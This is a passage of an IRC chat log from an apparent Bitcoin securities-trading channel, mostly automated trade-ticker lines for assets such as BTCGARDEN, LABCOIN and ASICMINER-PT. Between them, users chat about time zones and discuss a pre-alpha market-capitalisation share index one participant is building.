0.016 = 9.6 BTC [+] Aug 03 10:52:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.03802 = 1.901 BTC [-] Aug 03 10:52:13 [BTCTC] [ASICMINER-PT] 1 @ 3.92 BTC [+] Aug 03 10:52:59 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 10:53:09 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 10:53:26 [BTCTC] [BTCGARDEN] 244 @ 0.016 = 3.904 BTC [+] Aug 03 10:53:40 [BTCTC] [BTCGARDEN] 196 @ 0.016 = 3.136 BTC [+] Aug 03 10:54:17 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 10:54:31 [BTCTC] [ACTIVEMINING] 25 @ 0.005831 = 0.1458 BTC [-] Aug 03 10:54:33 [BTCTC] [ACTIVEMINING] 2 @ 0.00583 = 0.0117 BTC [-] Aug 03 10:54:34 [BTCTC] [ACTIVEMINING] 310 @ 0.005819 = 1.8039 BTC [-] Aug 03 10:54:35 [BTCTC] [ACTIVEMINING] 1240 @ 0.005818 = 7.2143 BTC [-] Aug 03 10:54:54 [BTCTC] [ASICMINER-PT] 1 @ 3.911 BTC [-] Aug 03 10:55:08 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 10:55:25 [BTCTC] [LABCOIN] 500 @ 0.001862 = 0.931 BTC [+] Aug 03 10:55:26 [BTCTC] [LABCOIN] 500 @ 0.001861 = 0.9305 BTC [-] Aug 03 10:55:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.03802 = 0.1901 BTC [-] Aug 03 10:55:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.038 = 0.114 BTC [-] Aug 03 10:55:37 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 10:55:44 [BTCTC] [BTCGARDEN] 2140 @ 0.016 = 34.24 BTC [+] Aug 03 10:55:45 [BTCTC] [ASICMINER-PT] 2 @ 3.911 = 7.822 BTC [-] Aug 03 10:55:53 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [+] Aug 03 10:56:07 [BTCTC] [BTCGARDEN] 387 @ 0.016 = 6.192 BTC [+] Aug 03 10:56:21 [BTCTC] [BTCGARDEN] 480 @ 0.016 = 7.68 BTC [+] Aug 03 10:56:21 [BTCTC] [LABCOIN] 3258 @ 0.001861 = 6.0631 BTC [-] Aug 03 10:56:25 [BTCTC] [LABCOIN] 442 @ 0.00186 = 0.8221 BTC [-] Aug 03 10:56:27 [BTCTC] [LABCOIN] 1000 @ 0.00186 = 1.86 BTC [-] Aug 03 10:56:29 [BTCTC] [LABCOIN] 60 @ 0.001859 = 0.1115 BTC [-] Aug 03 10:56:30 [BTCTC] [LABCOIN] 3230 @ 0.001859 = 6.0046 BTC [-] Aug 03 10:56:32 [BTCTC] [BTCGARDEN] 41 @ 0.016 = 0.656 BTC [+] Aug 03 10:56:41 [BTCTC] [BTCGARDEN] 116 @ 0.016 = 1.856 BTC [+] Aug 03 10:57:18 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 10:57:30 [BTCTC] [LABCOIN] 3421 @ 0.001858 = 6.3562 BTC [-] Aug 03 10:57:39 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 10:57:40 [BTCTC] [ASICMINER-PT] 1 @ 3.912 BTC [+] Aug 03 10:57:50 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:57:52 [BTCTC] [BTCGARDEN] 940 @ 0.016 = 15.04 BTC [+] Aug 03 10:58:23 [BTCTC] [BTCGARDEN] 120 @ 0.016 = 1.92 BTC [+] Aug 03 10:58:34 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 10:58:51 [BTCTC] [BTCGARDEN] 1180 @ 0.016 = 18.88 BTC [+] Aug 03 10:59:16 [BTCTC] [BTCGARDEN] 962 @ 0.016 = 15.392 BTC [+] Aug 03 10:59:24 [BTCTC] [BTCGARDEN] 281 @ 0.016 = 4.496 BTC [+] Aug 03 10:59:25 [BTCTC] [LABCOIN] 500 @ 0.001859 = 0.9295 BTC [+] Aug 03 10:59:27 [BTCTC] [LABCOIN] 1579 @ 0.001858 = 2.9338 BTC [-] Aug 03 10:59:28 [BTCTC] [LABCOIN] 100 @ 0.001856 = 0.1856 BTC [-] Aug 03 10:59:30 [BTCTC] [LABCOIN] 100 @ 0.00185 = 0.185 BTC [-] Aug 03 10:59:30 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 10:59:31 [BTCTC] [LABCOIN] 545 @ 0.00185 = 1.0083 BTC [-] Aug 03 10:59:33 [BTCTC] [LABCOIN] 400 @ 0.00185 = 0.74 BTC [-] Aug 03 10:59:34 [BTCTC] [DMS.PURCHASE] 100 @ 0.03394 = 3.394 BTC [-] Aug 03 10:59:35 [BTCTC] [LABCOIN] 300 @ 0.00185 = 0.555 BTC [-] Aug 03 10:59:37 [BTCTC] [LABCOIN] 250 @ 0.001842 = 0.4605 BTC [-] Aug 03 10:59:38 [BTCTC] [LABCOIN] 40 @ 0.001841 = 0.0736 BTC [-] Aug 03 10:59:39 [BTCTC] [LABCOIN] 2400 @ 0.001841 = 4.4184 BTC [-] Aug 03 10:59:40 [BTCTC] [LABCOIN] 110 @ 0.001841 = 0.2025 BTC [-] Aug 03 10:59:42 [BTCTC] [LABCOIN] 676 @ 0.00184 = 1.2438 BTC [-] Aug 03 10:59:46 [BTCTC] [BTCGARDEN] 1320 @ 0.016 = 21.12 BTC [+] Aug 03 10:59:47 [BTCTC] [BTCGARDEN] 12 @ 0.016 = 0.192 BTC [+] Aug 03 11:00:08 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:00:18 [BTCTC] [BTCGARDEN] 411 @ 0.016 = 6.576 BTC [+] Aug 03 11:00:34 [BTCTC] [BTCGARDEN] 443 @ 0.016 = 7.088 BTC [+] Aug 03 11:00:58 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [-] Aug 03 11:01:20 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 03 11:01:23 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 11:01:38 [BTCTC] [KENILWORTH] 1 @ 0.001556 BTC [-] Aug 03 11:01:45 [BTCTC] [BTCGARDEN] 3940 @ 0.016 = 63.04 BTC [+] Aug 03 11:01:46 [BTCTC] [LABCOIN] 500 @ 0.001841 = 0.9205 BTC [+] Aug 03 11:01:56 [BTCTC] [BTCGARDEN] 755 @ 0.016 = 12.08 BTC [+] Aug 03 11:02:13 [BTCTC] [LTC-ATF.B2] 1 @ 0.01002 BTC [-] Aug 03 11:02:35 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:02:51 [BTCTC] [BTCGARDEN] 558 @ 0.016 = 8.928 BTC [+] Aug 03 11:02:59 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 03 11:03:20 [BTCTC] [BASIC-MINING] 1 @ 0.3505 BTC [+] Aug 03 11:03:32 [BTCTC] [ACTIVEMINING] 1 @ 0.005978 BTC [+] Aug 03 11:03:45 [BTCTC] [ACTIVEMINING] 25 @ 0.005851 = 0.1463 BTC [-] Aug 03 11:03:48 [BTCTC] [ASICMINER-PT] 1 @ 3.903 BTC [-] Aug 03 11:03:58 [BTCTC] [BTCGARDEN] 5299 @ 0.016 = 84.784 BTC [+] Aug 03 11:03:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.038 BTC [-] Aug 03 11:04:03 [BTCTC] [ACTIVEMINING] 10 @ 0.005851 = 0.0585 BTC [-] Aug 03 11:04:15 [BTCTC] [LABCOIN] 54 @ 0.00184 = 0.0994 BTC [-] Aug 03 11:04:33 [BTCTC] [ASICMINER-PT] 1 @ 3.903 BTC [-] Aug 03 11:04:36 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 11:04:46 [BTCTC] [COGNITIVE] 1 @ 0.4105 BTC [-] Aug 03 11:05:26 [BTCTC] [COGNITIVE] 1 @ 0.4105 BTC [-] Aug 03 11:06:15 [BTCTC] [BTCGARDEN] 275 @ 0.016 = 4.4 BTC [+] Aug 03 11:07:08 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 03 11:07:38 [BTCTC] [ASICMINER-PT] 2 @ 3.903 = 7.806 BTC [-] Aug 03 11:07:40 [BTCTC] [ASICMINER-PT] 1 @ 3.902 BTC [-] Aug 03 11:07:41 [BTCTC] [ASICMINER-PT] 1 @ 3.901 BTC [-] Aug 03 11:07:42 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [-] Aug 03 11:07:43 [BTCTC] [ASICMINER-PT] 2 @ 3.9 = 7.8 BTC [-] Aug 03 11:07:44 [BTCTC] [ASICMINER-PT] 2 @ 3.9 = 7.8 BTC [-] Aug 03 11:07:45 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [-] Aug 03 11:07:51 [BTCTC] [BTCGARDEN] 120 @ 0.016 = 1.92 BTC [+] Aug 03 11:08:01 [BTCTC] [BTCGARDEN] 650 @ 0.016 = 10.4 BTC [+] Aug 03 11:08:12 [BTCTC] [BTCGARDEN] 532 @ 0.016 = 8.512 BTC [+] Aug 03 11:08:19 [BTCTC] [BTCGARDEN] 18 @ 0.016 = 0.288 BTC [+] Aug 03 11:08:40 [BTCTC] [BTCGARDEN] 2600 @ 0.016 = 41.6 BTC [+] Aug 03 11:08:43 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 03 11:10:08 [BTCTC] [BTCGARDEN] 115 @ 0.016 = 1.84 BTC [+] Aug 03 11:10:53 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:11:08 [BTCTC] [ASICMINER-PT] 1 @ 3.864 BTC [-] Aug 03 11:11:10 [BTCTC] [ASICMINER-PT] 1 @ 3.863 BTC [-] Aug 03 11:11:11 [BTCTC] [ASICMINER-PT] 2 @ 3.861 = 7.722 BTC [-] Aug 03 11:11:12 [BTCTC] [ASICMINER-PT] 2 @ 3.86 = 7.72 BTC [-] Aug 03 11:11:14 [BTCTC] [ASICMINER-PT] 1 @ 3.855 BTC [-] Aug 03 11:11:15 [BTCTC] [ASICMINER-PT] 10 @ 3.853 = 38.53 BTC [-] Aug 03 11:11:16 [BTCTC] [ASICMINER-PT] 9 @ 3.852 = 34.668 BTC [-] Aug 03 11:11:23 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 11:11:50 [BTCTC] [LABCOIN] 1825 @ 0.001832 = 3.3434 BTC [-] Aug 03 11:11:52 [BTCTC] [LABCOIN] 500 @ 0.001831 = 0.9155 BTC [-] Aug 03 11:11:52 [BTCTC] [LABCOIN] 7650 @ 0.00183 = 13.9995 BTC [-] Aug 03 11:11:53 [BTCTC] [LABCOIN] 500 @ 0.00183 = 0.915 BTC [-] Aug 03 11:11:54 [BTCTC] [LABCOIN] 100 @ 0.001825 = 0.1825 BTC [-] Aug 03 11:11:56 [BTCTC] [LABCOIN] 300 @ 0.00182 = 0.546 BTC [-] Aug 03 11:11:57 [BTCTC] [LABCOIN] 6336 @ 0.00181 = 11.4682 BTC [-] Aug 03 11:12:48 http://trilema.com/2013/1btc-moving-right-along/ Aug 03 11:12:56 1BTC moving right along pe Trilema - Un blog de Mircea Popescu. Aug 03 11:12:58 and if there's people with a lot of isk i want to talk to you! Aug 03 11:13:16 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 11:13:44 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 03 11:13:46 [BTCTC] [COGNITIVE] 1 @ 0.38 BTC [-] Aug 03 11:14:00 [BTCTC] [COGNITIVE] 1 @ 0.38 BTC [-] Aug 03 11:14:14 [BTCTC] [COGNITIVE] 1 @ 0.38 BTC [-] Aug 03 11:14:23 [BTCTC] [ACTIVEMINING] 25 @ 0.005851 = 0.1463 BTC [-] Aug 03 11:14:24 [BTCTC] [ACTIVEMINING] 200 @ 0.00585 = 1.17 BTC [-] Aug 03 11:14:25 [BTCTC] [ACTIVEMINING] 30 @ 0.0058 = 0.174 BTC [-] Aug 03 11:14:26 [BTCTC] [ACTIVEMINING] 1 @ 0.0057 BTC [-] Aug 03 11:14:27 [BTCTC] [ACTIVEMINING] 100 @ 0.005692 = 0.5692 BTC [-] Aug 03 11:14:28 [BTCTC] [ACTIVEMINING] 454 @ 0.00569 = 2.5833 BTC [-] Aug 03 11:14:29 [BTCTC] [ACTIVEMINING] 1 @ 0.005631 BTC [-] Aug 03 11:14:30 [BTCTC] [ACTIVEMINING] 19 @ 0.005508 = 0.1047 BTC [-] Aug 03 11:14:31 [BTCTC] [ACTIVEMINING] 79 @ 0.005507 = 0.4351 BTC [-] Aug 03 11:14:32 [BTCTC] [ACTIVEMINING] 50 @ 0.005502 = 0.2751 BTC [-] Aug 03 11:14:33 [BTCTC] [ACTIVEMINING] 200 @ 0.005501 = 1.1002 BTC [-] Aug 03 11:14:33 [BTCTC] [ACTIVEMINING] 6 @ 0.005451 = 0.0327 BTC [-] Aug 03 11:14:34 [BTCTC] [ACTIVEMINING] 25 @ 0.00545 = 0.1363 BTC [-] Aug 03 11:14:35 [BTCTC] [ACTIVEMINING] 562 @ 0.005403 = 3.0365 BTC [-] Aug 03 11:14:36 [BTCTC] [ACTIVEMINING] 1851 @ 0.005402 = 9.9991 BTC [-] Aug 03 11:14:37 [BTCTC] [ACTIVEMINING] 375 @ 0.005402 = 2.0258 BTC [-] Aug 03 11:14:38 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 11:14:57 [BTCTC] [LABCOIN] 1 @ 0.001811 BTC [+] Aug 03 11:14:58 [BTCTC] [LABCOIN] 445 @ 0.001811 = 0.8059 BTC [+] Aug 03 11:15:00 [BTCTC] [BTCGARDEN] 71 @ 0.016 = 1.136 BTC [+] Aug 03 11:15:16 [BTCTC] [ACTIVEMINING] 25 @ 0.005403 = 0.1351 BTC [+] Aug 03 11:15:16 [BTCTC] [ACTIVEMINING] 25 @ 0.005402 = 0.1351 BTC [-] Aug 03 11:15:18 [BTCTC] [ACTIVEMINING] 37 @ 0.005301 = 0.1961 BTC [-] Aug 03 11:15:20 [BTCTC] [ACTIVEMINING] 150 @ 0.0053 = 0.795 BTC [-] Aug 03 11:15:21 [BTCTC] [ACTIVEMINING] 56 @ 0.005218 = 0.2922 BTC [-] Aug 03 11:15:22 [BTCTC] [ACTIVEMINING] 227 @ 0.005217 = 1.1843 BTC [-] Aug 03 11:15:23 [BTCTC] [ACTIVEMINING] 63 @ 0.005201 = 0.3277 BTC [-] Aug 03 11:15:25 [BTCTC] [ACTIVEMINING] 5 @ 0.0052 = 0.026 BTC [-] Aug 03 11:15:26 [BTCTC] [ACTIVEMINING] 250 @ 0.0052 = 1.3 BTC [-] Aug 03 11:15:27 [BTCTC] [ACTIVEMINING] 1000 @ 0.00515 = 5.15 BTC [-] Aug 03 11:15:28 [BTCTC] [ACTIVEMINING] 8 @ 0.00511 = 0.0409 BTC [-] Aug 03 11:15:28 [BTCTC] [ACTIVEMINING] 150 @ 0.005102 = 0.7653 BTC [-] Aug 03 11:15:29 [BTCTC] [ACTIVEMINING] 1000 @ 0.005051 = 5.051 BTC [-] Aug 03 11:15:30 [BTCTC] [ACTIVEMINING] 1000 @ 0.00505 = 5.05 BTC [-] Aug 03 11:15:32 [BTCTC] [ACTIVEMINING] 215 @ 0.005 = 1.075 BTC [-] Aug 03 11:15:33 [BTCTC] [ACTIVEMINING] 1963 @ 0.005 = 9.815 BTC [-] Aug 03 11:16:05 [BTCTC] [ACTIVEMINING] 161 @ 0.005995 = 0.9652 BTC [+] Aug 03 11:16:12 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 11:16:15 [BTCTC] [TAT.ASICMINER] 11 @ 0.038 = 0.418 BTC [-] Aug 03 11:16:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.038 BTC [-] Aug 03 11:16:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.038 BTC [-] Aug 03 11:16:19 [BTCTC] [TAT.ASICMINER] 17 @ 0.0379 = 0.6443 BTC [-] Aug 03 11:16:50 [BTCTC] [TAT.ASICMINER] 13 @ 0.0379 = 0.4927 BTC [-] Aug 03 11:16:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.03751 = 0.075 BTC [-] Aug 03 11:16:53 [BTCTC] [BTCGARDEN] 1300 @ 0.016 = 20.8 BTC [+] Aug 03 11:17:07 [BTCTC] [BTCGARDEN] 75 @ 0.016 = 1.2 BTC [+] Aug 03 11:17:23 [BTCTC] [BTCGARDEN] 81 @ 0.016 = 1.296 BTC [+] Aug 03 11:17:26 [BTCTC] [BTCGARDEN] 4200 @ 0.016 = 67.2 BTC [+] Aug 03 11:17:28 [BTCTC] [LABCOIN] 79 @ 0.00193 = 0.1525 BTC [+] Aug 03 11:17:43 [BTCTC] [TAT.ASICMINER] 4 @ 0.0371 = 0.1484 BTC [-] Aug 03 11:17:59 [BTCTC] [ACTIVEMINING] 1 @ 0.00599 BTC [-] Aug 03 11:18:11 [BTCTC] [COGNITIVE] 1 @ 0.38 BTC [-] Aug 03 11:18:20 [BTCTC] [ACTIVEMINING] 79 @ 0.005989 = 0.4731 BTC [-] Aug 03 11:18:41 [BTCTC] [BTCGARDEN] 120 @ 0.016 = 1.92 BTC [+] Aug 03 11:18:51 [BTCTC] [BTCGARDEN] 23 @ 0.016 = 0.368 BTC [+] Aug 03 11:19:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.0371 = 0.1484 BTC [-] Aug 03 11:20:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.0371 = 1.855 BTC [-] Aug 03 11:20:02 [BTCTC] [TAT.ASICMINER] 7 @ 0.03707 = 0.2595 BTC [-] Aug 03 11:20:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.03701 = 0.111 BTC [-] Aug 03 11:20:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.037 = 0.074 BTC [-] Aug 03 11:20:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.037 = 0.37 BTC [-] Aug 03 11:20:08 [BTCTC] [TAT.ASICMINER] 38 @ 0.037 = 1.406 BTC [-] Aug 03 11:20:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.03681 = 0.1104 BTC [-] Aug 03 11:20:53 [BTCTC] [BTCGARDEN] 1970 @ 0.016 = 31.52 BTC [+] Aug 03 11:21:07 [BTCTC] [BTCGARDEN] 20000 @ 0.016 = 320 BTC [+] Aug 03 11:21:51 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 11:22:17 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 03 11:22:36 [BTCTC] [BTCGARDEN] 3000 @ 0.016 = 48 BTC [+] Aug 03 11:22:38 any1 awake? Aug 03 11:22:48 [BTCTC] [BTCGARDEN] 60 @ 0.016 = 0.96 BTC [+] Aug 03 11:22:49 [BTCTC] [LABCOIN] 1 @ 0.001838 BTC [-] Aug 03 11:22:50 [BTCTC] [LABCOIN] 24 @ 0.001927 = 0.0462 BTC [+] Aug 03 11:23:01 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 03 11:23:12 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 11:23:13 [BTCTC] [BTCGARDEN] 800 @ 0.016 = 12.8 BTC [+] Aug 03 11:23:19 yeah Aug 03 11:23:24 only 6:30pm here in aus Aug 03 11:23:54 4:30pm on the good side :) Aug 03 11:23:59 [BTCTC] [ACTIVEMINING] 5 @ 0.005799 = 0.029 BTC [-] Aug 03 11:24:05 well, greetings from germany. i need you guys to take a look at something if you have a few mins. Aug 03 11:24:12 http://dcx.smidge.com Aug 03 11:24:31 i will post a thread on this today or tomorrow Aug 03 11:24:57 good side? you mean that small town known as perth Aug 03 11:25:22 indeed Aug 03 11:26:00 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 11:26:07 yay Aug 03 11:26:20 i don't like the chart, but the idea :) Aug 03 11:26:28 looks fine smidge Aug 03 11:26:29 i know the chart sucks :) Aug 03 11:26:37 and its all pre-alpha Aug 03 11:27:04 you take summed outstanding shares x price for the listed assets? Aug 03 11:27:37 coming to melb in sept for a couple of days tho kidkrypto Aug 03 11:27:41 price and mkt cap in relation to previous values Aug 03 11:28:01 i've just moved here from wollongong Aug 03 11:28:03 its the laspayres method Aug 03 11:28:09 ahh ok Aug 03 11:28:39 anyone here buy xbond Aug 03 11:28:41 smidge would help if it explained wtf it is. Aug 03 11:28:41 what does "in rel to previous values" mean? Aug 03 11:29:53 mircea it takes some basic knowledge to understand Aug 03 11:29:56 [BTCTC] [BTCGARDEN] 62 @ 0.016 = 0.992 BTC [+] Aug 03 11:30:19 i will write a description for it especially for you Aug 03 11:30:21 [BTCTC] [DMS.SELLING] 2 @ 0.02428 = 0.0486 BTC [+] Aug 03 11:30:48 dexX7 "in rel to previous values" - i will post the formula Aug 03 11:30:51 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:31:04 [HAVELOCK] [LABCO] 29 @ 0.0028999 = 0.0841 BTC [-] Aug 03 11:31:19 please, because.. 1 min Aug 03 11:31:24 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:31:34 [BTCTC] [BTCGARDEN] 2500 @ 0.016 = 40 BTC [+] Aug 03 11:31:42 [BTCTC] [COGNITIVE] 1 @ 0.38 BTC [-] Aug 03 11:32:01 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 11:32:12 [BTCTC] [BTCGARDEN] 15640 @ 0.016 = 250.24 BTC [+] Aug 03 11:32:32 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:32:41 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 11:32:45 there's a difference between "basic knowledge" in the objective sense of "what anyone should know" and "basic knowledge" in the subjective sense of "the sum of what's left once we substract out of basic knowledge all the shit i don't know". Aug 03 11:32:56 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 11:33:01 don't confuse the two. Aug 03 11:33:02 [BTCTC] [BTCGARDEN] 63 @ 0.016 = 1.008 BTC [+] Aug 03 11:33:15 [BTCTC] [BTCGARDEN] 29 @ 0.016 = 0.464 BTC [+] Aug 03 11:33:18 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 11:33:21 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:33:25 yes. i knew you would educate me on it. thats because i love you. Aug 03 11:33:39 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 11:33:42 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 11:33:50 mircea_popescu: shhh stop clutter this topic Aug 03 11:33:52 [BTCTC] [ACTIVEMINING] 5 @ 0.005745 = 0.0287 BTC [-] Aug 03 11:34:12 userioao it's a chan not a topic, esl boi. also, children not childrens. Aug 03 11:34:23 whatever Aug 03 11:34:33 hey, you got one right! Aug 03 11:34:38 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:34:40 smidge: http://i.imgur.com/zzIcRdi.jpg << my experimental take on this. all assets x price * outstanding Aug 03 11:34:53 [HAVELOCK] [LABCO] 145 @ 0.0029 = 0.4205 BTC [+] Aug 03 11:35:11 intersting Aug 03 11:35:15 *interesting Aug 03 11:35:22 *interdasting Aug 03 11:35:24 [BTCTC] [BTCGARDEN] 193 @ 0.016 = 3.088 BTC [+] Aug 03 11:35:27 [BTCTC] [ACTIVEMINING] 500 @ 0.0057 = 2.85 BTC [-] Aug 03 11:35:33 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [+] Aug 03 11:35:40 [BTCTC] [DMS.MINING] 3 @ 0.009905 = 0.0297 BTC [-] Aug 03 11:35:43 [BTCTC] [BASIC-MINING] 1 @ 0.39 BTC [+] Aug 03 11:36:12 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 11:36:13 [BTCTC] [BASIC-MINING] 1 @ 0.3508 BTC [-] Aug 03 11:36:21 [HAVELOCK] [XBOND] 230 @ 0.00104899 = 0.2413 BTC [-] Aug 03 11:36:27 [BTCTC] [BASIC-MINING] 1 @ 0.3507 BTC [-] Aug 03 11:36:37 [BTCTC] [BASIC-MINING] 2 @ 0.3507 = 0.7014 BTC [-] Aug 03 11:36:37 but this isn't really reflecting what's going on, i guess Aug 03 11:36:46 [BTCTC] [BTCGARDEN] 145 @ 0.016 = 2.32 BTC [+] Aug 03 11:37:00 there are only a few assets in there Aug 03 11:37:04 more to come Aug 03 11:37:13 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 11:37:23 plus, the general problem is that assets like AM are too heavy weight Aug 03 11:37:35 BSI? Aug 03 11:37:42 [BTCTC] [BTCGARDEN] 4200 @ 0.016 = 67.2 BTC [+] Aug 03 11:37:42 well, but they do have much weight Aug 03 11:37:43 [BTCTC] [DMS.SELLING] 40 @ 0.02427 = 0.9708 BTC [-] Aug 03 11:37:44 [BTCTC] [COGNITIVE] 1 @ 0.4 BTC [+] Aug 03 11:37:48 btc-tc share index ;) Aug 03 11:37:49 [BTCTC] [BTCGARDEN] 8 @ 0.016 = 0.128 BTC [+] Aug 03 11:37:52 [BTCTC] [BTCGARDEN] 110 @ 0.016 = 1.76 BTC [+] Aug 03 11:37:55 nice. i like it Aug 03 11:37:57 [BTCTC] [BTCGARDEN] 3372 @ 0.016 = 53.952 BTC [+] Aug 03 11:38:06 [BTCTC] [ASICMINER-PT] 1 @ 3.852 BTC [-] Aug 03 11:38:12 [BTCTC] [BTCGARDEN] 285 @ 0.016 = 4.56 BTC [+] Aug 03 11:38:24 dexX7, do you have a permanent url for that index? Aug 03 11:38:25 it's nice to play with, but nothing more at the moment Aug 03 11:38:26 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 03 11:38:29 nope Aug 03 11:38:31 [BTCTC] [DMS.MINING] 4 @ 0.01141 = 0.0456 BTC [+] Aug 03 11:38:32 as said, its pre-alpha. there will be more securities in there to reflect a realistic benchmark, plus more frequent updates Aug 03 11:38:32 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 03 11:38:35 like i said, just playing around Aug 03 11:38:49 damn, I'm interested in something like that Aug 03 11:38:54 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 11:38:56 [BTCTC] [ASICMINER-PT] 2 @ 3.852 = 7.704 BTC [-] Aug 03 11:39:03 some things to consider: exclude company held shares which aren't intended to trade anyway Aug 03 11:39:10 those are some crazy dojis Aug 03 11:39:44 and stuff like funds shouldn't be included etc. Aug 03 11:39:50 [BTCTC] [BTCGARDEN] 700 @ 0.016 = 11.2 BTC [+] Aug 03 11:40:13 basically asicminer + scamfest. you should probably make two tiers. Aug 03 11:40:15 the universe is too small Aug 03 11:40:21 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 11:40:23 [HAVELOCK] [SDSTM] 20 @ 0.00777777 = 0.1556 BTC [+] Aug 03 11:40:24 funds wont be in there, regardless of mkt cap Aug 03 11:40:33 [BTCTC] [BTCGARDEN] 17 @ 0.016 = 0.272 BTC [+] Aug 03 11:40:38 good Aug 03 11:40:38 [HAVELOCK] [SDSTM] 67 @ 0.00777 = 0.5206 BTC [-] Aug 03 11:40:40 [BTCTC] [BTCGARDEN] 125 @ 0.016 = 2 BTC [+] Aug 03 11:40:45 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 11:41:36 [BTCTC] [BTCGARDEN] 625 @ 0.016 = 10 BTC [+] Aug 03 11:41:52 [HAVELOCK] [SDSTM] 9 @ 0.00777 = 0.0699 BTC [-] Aug 03 11:41:54 [BTCTC] [COGNITIVE] 20 @ 0.3701 = 7.402 BTC [-] Aug 03 11:41:57 [BTCTC] [BTCGARDEN] 33 @ 0.016 = 0.528 BTC [+] Aug 03 11:41:58 [BTCTC] [COGNITIVE] 20 @ 0.37 = 7.4 BTC [-] Aug 03 11:42:16 [BTCTC] [BTCGARDEN] 9350 @ 0.016 = 149.6 BTC [+] Aug 03 11:42:28 [BTCTC] [ASICMINER-PT] 1 @ 3.853 BTC [+] Aug 03 11:42:50 i will work on it a few more hours and post a thread, just wanna check how far i can take this Aug 03 11:42:51 [BTCTC] [BTCGARDEN] 921 @ 0.016 = 14.736 BTC [+] Aug 03 11:42:53 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 03 11:43:00 [BTCTC] [BTCGARDEN] 1085 @ 0.016 = 17.36 BTC [+] Aug 03 11:43:08 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 03 11:43:10 [BTCTC] [BTCGARDEN] 2555 @ 0.016 = 40.88 BTC [+] Aug 03 11:43:22 [BTCTC] [BTCGARDEN] 53 @ 0.016 = 0.848 BTC [+] Aug 03 11:43:25 [BTCTC] [BTCGARDEN] 526 @ 